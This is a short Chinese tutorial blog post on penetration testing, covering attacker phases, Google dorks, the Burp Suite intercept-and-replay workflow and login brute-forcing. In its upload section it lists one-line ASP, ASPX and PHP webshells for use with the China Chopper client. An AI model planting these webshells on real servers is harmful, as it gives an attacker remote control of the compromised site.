文档章节

渗透测试的概念和实战

六道木
 六道木
发布于 07/04 17:33
字数 620
阅读 117
收藏 0

行业解决方案、产品招募中!想赚钱就来传!>>>

1.前言

渗透测试时通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。

2.常见web安全漏洞

3.思路

3.1渗透测试思路

信息收集->攻击测试

3.2黑客攻击思路

信息收集->攻击测试->提升权限->扩大成果->清除痕迹

4.暴力破解

4.1谷歌黑语法

4.1.1黑语法inurl:搜索url包含指定字符串

4.1.2黑语法intitle:搜索网页中的标题名是否包含指定字符串

4.1.3黑语法intext:搜索网页正文内容是否包含指定字符串

4.2Burpsuite常用功能

Burpsuite是Java开发的工具,所以需要安装好JDK,版本最好1.8以上

使用流程:

拦截->抓包->改包->重放

4.2.1 拦截

点击options配置代理服务器

浏览器也要配置,这里使用火狐浏览器,安装插件proxy或者谷歌hackbar

4.2.2抓包

配置好,刷新浏览器就能截取到数据包

但此时并没有达到拦截效果,需要开启Intercept,改为ON

4.2.3改包

刷新浏览器就能截取到数据包,并拦截

4.2.4重放

重放数据包

4.3后台暴力破解

对登陆数据包不存在的验证码、token等一次性验证进行破解。

5.上传木马或漏洞

5.1一句话木马

  • asp:<%eval request(pass)%>
  • aspx:<%@Page Language%><?eval(Request.Item[pass]. unsafe);%>
  • php:<?php @eval($_POST[pass];);?>

5.2上传漏洞

软件:中国菜刀,配合木马使用

 

 

六道木
粉丝 1
博文 80
码字总数 129539
作品 0
东莞
程序员
私信 提问
加载中
请先登录后再评论。
TDD的测试框架--Machine.Specification

Machine.Specification 是一个 TDD 测试驱动开发的测试框架,简化了测试,无需关心语言本身特性。 Machine.Specifications 带来的好处是不需要在代码里有注释,但同时阅读代码的人可以一目了...

匿名
2013/01/22
1.1K
0
Rails 测试工具--RailsBench

Railsbench是一款专门用于rails的测试工具。 1. 安装Railsbench # gem install railsbench # gem install gruff # gem install rmagick...

匿名
2013/02/17
348
0
WebUI自动化测试框架--Dagger

Dagger是网易杭州研究院QA团队开发的一个轻量级、运行稳定的WebUI自动化测试框架,主要基于Selenium及TestNg可以认为是对Selenium进行二次封装的一个框架(俗称 造轮子 )。之所以把这个轮子...

ChenKan
2013/03/05
2.8W
6
性能测试工具--simperf

Simperf 是一个简单的性能测试工具,它提供了一个多线程测试框架 Example: 1. 在代码里使用Simperf Simperf perf = new Simperf(50, 2000, 1000, // 设置结果输出文件,默认 simperf-result...

imbugs
2013/01/04
1.2K
0
C++ 单元测试框架--cipra

cipra 是一个简单的、兼容 TAP (Test Anything Protocol) 的 C++ 单元测试框架。100% 使用标准的 C++11 编写,只提供一组头文件,可很方便的在你的 C++11 项目中使用。...

匿名
2013/04/17
1K
0

没有更多内容

加载失败,请刷新页面

加载更多

如何在Pandas的DataFrame中的行上进行迭代? - How to iterate over rows in a DataFrame in Pandas?

问题: I have a DataFrame from pandas: 我有一个来自熊猫的DataFrame : import pandas as pdinp = [{'c1':10, 'c2':100}, {'c1':11,'c2':110}, {'c1':12,'c2':120}]df = pd.DataFrame(......

富含淀粉
昨天
20
0
与电商节伴生,平台销量榜单背后还有被低估的营销价值

文 | 曾响铃 来源 | 科技向令说(xiangling0815) 时至今日,电商节已经成为各巨头零售平台例行的活动,花样在不断创新,玩法也在不断涌现。 在这个过程中,伴随电商节的各种品牌、产品销量榜...

曾响铃
昨天
22
0
volatile关键字详解

前言 提到JAVA的并发编程,就不得不提volatile关键字,不管是在面试还是实际开发中,volatile关键字的使用都是一个应该掌握的技能。它之所以重要,是因为它和JAVA并发编程中会遇到三种重要问...

ls_cherish
昨天
15
0
比继承更偏爱组成? - Prefer composition over inheritance?

问题: Why prefer composition over inheritance? 为什么更喜欢使用组合而不是继承? What trade-offs are there for each approach? 每种方法都有哪些取舍? When should you choose inher...

javail
昨天
26
0
2020软件测试工程师史上最全面试题(内含答案)-看完BATJ面试官对你竖起大拇指!

以下是软件测试相关的面试题及答案,欢迎大家参考! 我不是至尊宝,也不是孙悟空,我只是那城墙下的一猿。  1、你的测试职业发展是什么?  测试经验越多,测试能力越高。所以我的职业发展是需...

程序员一凡
昨天
17
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部